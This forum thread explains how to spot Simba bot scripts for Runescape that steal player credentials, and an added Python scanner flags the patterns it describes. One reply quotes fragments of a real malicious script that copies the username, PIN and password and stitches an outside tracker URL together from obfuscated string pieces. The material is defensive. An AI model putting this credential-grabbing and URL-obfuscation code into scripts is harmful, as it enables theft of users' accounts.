
Thread: How to check for malicious scripts

  1. #1
    Join Date
    Jan 2012
    Posts
    26
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)

    How to check for malicious scripts

    Hello!

    I am curious about how we can check for scripts which will steal data and send it back to the creator.

    Can anyone advise please?

    Thanks

  2. #2
    Join Date
    Jan 2012
    Posts
    273
    Mentioned
    7 Post(s)
    Quoted
    6 Post(s)


    Quote Originally Posted by ninoqino View Post
    Hello!

    I am curious about how we can check for scripts which will steal data and send it back to the creator.

    Can anyone advise please?

    Thanks
    It isn't a straightforward thing to answer. I looked into one of the scripts that used to be here and got removed and the poster banned - someone asked about it earlier and this is what I saw:


    First of all, any time you have any kind of operation within the script that has username or password or pin on the RIGHT-HAND SIDE of the assignment, that's not good.

    An example from actual code that I looked at (also note statements that clearly are - for lack of a better term - utterly stupid nonsense, such as testing if 1+3 is larger than 0... that's just wrong, or assigning a variable its own value):


    Simba Code:
    Function LV:Boolean;
    begin
    If(1+3>0)then                      // <<< WHAT????
      begin
        C:=C;                          // <<< WHAT????
        I:=I;                          // <<< WHAT????
        Z:=Z;                          // <<< WHAT????
        I:=Players[CurrentPlayer].Name; // <<< AHA! that is where my login goes
        G:= Players[CurrentPlayer].Pin;
        Z:=Players[CurrentPlayer].Pass;
        Result:=True;
      end;
    end;

    Also look for cryptic stuff that does not need to be cryptic (i.e. why spend so much time writing so many short string variables to make one URL? Because you are throwing in my username and password and pin, duh!):

    Simba Code:
    Function K:Boolean;
    Var
      PZ,AZ,AX,TY,LM,BS,RJ,RF,DB,AJ,RN,TP,GY,PS,LJ,LD,DF,DT,YT,DS,DV,MM,BP,NP,FP,SW,QA,SX,RA,US,OZ,OP,LB:String;
      begin
        PZ:= I;   // <<<<< HEY is this my player username??????
        LM:= Z;   // <<<< HEY this looks an awfully much like the variable with my password
        FFS:='Au'; FPS:='th'; LLM:='en'; RBJ:='ti';RJK:='ca';KKK:='ted.';      //Authenticated..

                  //Decoder characters..
        LD:='fx';BS:= 'tu';RF:='re'; DB:='cr';OP:='i';OZ:='I';RN:= 'te';TP:= 'r.';
        GY:= 'zx';AZ:= ':/';PS:= 'q';DF:='e';US:='s'; TY:= 'ht'; DV:='da';DT:='t';YT:='/';
        DS:='up';LJ:='.n'; AJ:= 'af';MM:='te';BP:='r.';RJ:= 'na'; SW:='ph';AX:= 'tp';QA:='?v';
        SX:='er'; RA:='p';NP:='&';FP:='q=';

        Q:=NP;                                    //&
        L:=FP;                                    //q=
        TR:=TY+AX+AZ+YT+RJ+BS+RF+DB+AJ+RN+TP+GY+PS+LJ+DF+DT+'/tracker.'+SW+RA;  //TR:= http://naturecrafter.zxq.net/tracker.php

    So my suggestions are:

    • if the script is hard to read - run away from it
    • always have the Simba firewall on and do not just accept an exception without making sure that it uses a website that you trust
    • check the code for anything anomalous or nonsensical*
    • search for the pin and password and username variables and make sure they are not assigned to something else
    • if the script uses an ini file to store values, make sure that the values it reads are not similarly misused


    * loops like "while true do mainloop;" are however valid, they just say "keep looping until forever".
    Perfect script? There is no such thing as "perfect", only "better than you expect".
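As an added illustration of the checks zmon lists above (this is not code from the thread or from SRL), here is a small Python scanner over Simba/Pascal source that flags credential fields being read into other variables, runs of very short string literals, and long `+` chains, while skipping the routines named in the thread where credential handling is expected. The sample script, the regexes and the set of "safe" routine names are assumptions.

```python
import re

# Constructed sample (not a script from the thread) showing the two patterns zmon
# describes: credential fields read into other variables, and a stitched-up URL.
SAMPLE = """\
program demo;
procedure DeclarePlayers;
begin
  Players[0].Name := 'user';
end;
Function LV:Boolean;
begin
  I:=Players[CurrentPlayer].Name;
  Z:=Players[CurrentPlayer].Pass;
  Result:=True;
end;
Function K:Boolean;
begin
  TY:='ht'; AX:='tp'; AZ:=':/'; YT:='/'; SW:='ph'; RA:='p';
  TR:=TY+AX+AZ+YT+'/tracker.'+SW+RA;
end;
"""

FUNC_RE = re.compile(r'^\s*(?:function|procedure)\s+(\w+)', re.I)
# A credential field on the right-hand side of an assignment.
CRED_RE = re.compile(r':=[^;]*Players\[[^\]]*\]\.(Name|Pass|Pin)\b', re.I)
# Three or more 1-3 character string literals assigned on one line.
FRAG_RE = re.compile(r"(?:\w+\s*:=\s*'[^']{1,3}'\s*;\s*){3,}")
# Five or more '+' joins in one expression: a string being stitched together.
JOIN_RE = re.compile(r':=(?:[^;+]*\+){5,}')
# Routines where handling credentials is expected (names taken from the thread).
SAFE_FUNCS = {'declareplayers', 'inpin'}

def scan(source):
    """Return (line number, kind, stripped line) for each suspicious line."""
    findings, current = [], ''
    for lineno, line in enumerate(source.splitlines(), 1):
        head = FUNC_RE.match(line)
        if head:
            current = head.group(1).lower()
        if current in SAFE_FUNCS:
            continue
        if CRED_RE.search(line):
            findings.append((lineno, 'credential-read', line.strip()))
        elif FRAG_RE.search(line):
            findings.append((lineno, 'string-fragments', line.strip()))
        elif JOIN_RE.search(line):
            findings.append((lineno, 'concatenation', line.strip()))
    return findings
```

Running `scan(SAMPLE)` reports the two credential reads in LV and the two obfuscation lines in K, and nothing in DeclarePlayers; a hit is a line to read by hand, not proof of theft.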

  3. #3
    Join Date
    Oct 2008
    Location
    C:\Simba\Includes\
    Posts
    7,566
    Mentioned
    19 Post(s)
    Quoted
    180 Post(s)


    zmon basically hit the nail on the head. A quick way to check is to find where "Username", "Password", and "Pin" show up. If they appear anywhere outside of DeclarePlayers, InPin, or any other pre-built method from the SRL include, I would investigate it to see what it's doing.

    However, there's a ~1% chance you'll download a malicious script from here. We keep on top of that pretty well. Also, enable security.sex; it will show you all connections being made from a script.
    Away for awhile, life is keeping me busy. | Want to get my attention in a thread? @Kyle Undefined; me.
    { MSI Phoenix || SRL Stats Sigs || Paste || Scripts || Quotes || Graphics }

    When posting a bug, please post debug! Help us, help you!

    I would love to change the world, but they won't give me the source code. || To be the best, you've got to beat the rest. || Logic never changes, just the syntax.
    If you PM me with a stupid question or one listed in FAQ, or about a script that is not mine, I will NOT respond.


    SRL is a Library of routines made by the SRL community written for the Program Simba. We produce Scripts for the game Runescape.


  4. #4
    Join Date
    Feb 2006
    Location
    Tracy/Davis, California
    Posts
    12,631
    Mentioned
    135 Post(s)
    Quoted
    418 Post(s)


    Normally you can Ctrl+F for .name and if it's anywhere in the script besides the top/progress report then it might be risky.

    You can enable the security.sex extension and it will tell you every time the script tries to access the Internet. If it's trying to talk to anything besides SRL stats (and MAYBE the script's auto update page IF it has one (not many do)) then be worried.


    Honestly, in all of SRL/SCAR's history there have been very few malicious scripts, not much to worry about!

  5. #5
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)


    You have to have some knowledge in order to find certain lines of code which may send your username and password somewhere.

    The easiest way I can think of to prevent this is to do the following:

    1. Open Simba
    2. Click "View" and then click "Extensions"
    3. Enable security.sex

    Whenever Simba tries to make a connection somewhere it will prompt you and ask if you would like to allow the connection. If you see an unusual connection to some random website, decline it.

    Quote Originally Posted by YoHoJo View Post
    Honestly, in all of SRL/SCAR's history there have been very few malicious scripts, not much to worry about!
    This is very true. I have been here since 2008 and I have only ever seen one or two instances of someone creating a script to steal usernames and passwords.
    Last edited by cycrosism; 05-26-2012 at 07:51 AM.
    Click here to find out how to get full screen without members! | Click here to check out my Ultimate Bitmap Tutorial! Edited to work with Simba! |

  6. #6
    Join Date
    Jan 2012
    Posts
    26
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)


    Thanks so much for the clarification guys!

  7. #7
    Join Date
    Jul 2011
    Location
    /home/litoris
    Posts
    2,226
    Mentioned
    0 Post(s)
    Quoted
    159 Post(s)


    Generally, if the script communicates with a webpage it's malicious. I never get scripts off site, but when checking some I found around, I deleted all the links in the script.
    Miner & Urn Crafter & 07 Chicken Killer
    SPS BlindWalk Tutorial

    Working on: Nothing

    teacher in every art, brought the fire that hath proved to mortals a means to mighty ends

  8. #8
    Join Date
    Feb 2012
    Location
    Denver, CO
    Posts
    863
    Mentioned
    0 Post(s)
    Quoted
    0 Post(s)


    Wow, I didn't realize how well URLs could be disguised.

    Thanks for the info, guys!

  9. #9
    Join Date
    Feb 2011
    Location
    The Future.
    Posts
    5,600
    Mentioned
    396 Post(s)
    Quoted
    1598 Post(s)


    There's also another way that's a bit harder to recognize..

    [Content removed]

    This kind of malicious script is actually pretty well hidden and a simple control F does nothing.

    EDITED: Post was too detailed.. Like Yohojo said below.. the ideas mentioned are too dangerous..
    Last edited by Brandon; 05-27-2012 at 07:31 AM.
    I am Ggzz..
    Hackintosher

  10. #10
    Join Date
    Feb 2006
    Location
    Tracy/Davis, California
    Posts
    12,631
    Mentioned
    135 Post(s)
    Quoted
    418 Post(s)


    InB4 h3x0rs use this thread to make one D:

  11. #11
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)


    Quote Originally Posted by litoris View Post
    Generally, if the script communicates with a webpage it's malicious.
    This is false.

  12. #12
    Join Date
    Nov 2007
    Location
    Nowhereville
    Posts
    1,155
    Mentioned
    0 Post(s)
    Quoted
    3 Post(s)


    Quote Originally Posted by cycrosism View Post
    This is false.
    I'll concur. Lots of scripts that connect to webpages create accounts, check the itemdb, check for updates, and do lots of other things.
    Formerly known as Cut em2 it

  13. #13
    Join Date
    Nov 2008
    Location
    Melbourne, Australia
    Posts
    2,240
    Mentioned
    3 Post(s)
    Quoted
    11 Post(s)


    Quote Originally Posted by Cut em2 it View Post
    I'll concur. Lots of scripts that connect to webpages create accounts, check the itemdb, check for updates, and do lots of other things.
    I made a script that when it was run (Before it opened SMART and all of that), would connect to my website and grab the latest "news" that I had put up and would also check to make sure the script was up to date.

    It never sent any data to my website. Only read data using the GetPage function.

    It would grab this link here

    http://cycrosism.webs.com/news.txt

    Then it would read all of the data from it and print it out in the debug box. That was all it did. I also made a version checker but I cannot seem to find it anywhere.

    Here is a sample of how I did this.

    Simba Code:
    program new;
    begin
      Cleardebug;
      Writeln(Getpage('http://cycrosism.webs.com/news.txt'));
    end.
    Last edited by cycrosism; 05-27-2012 at 09:12 AM.
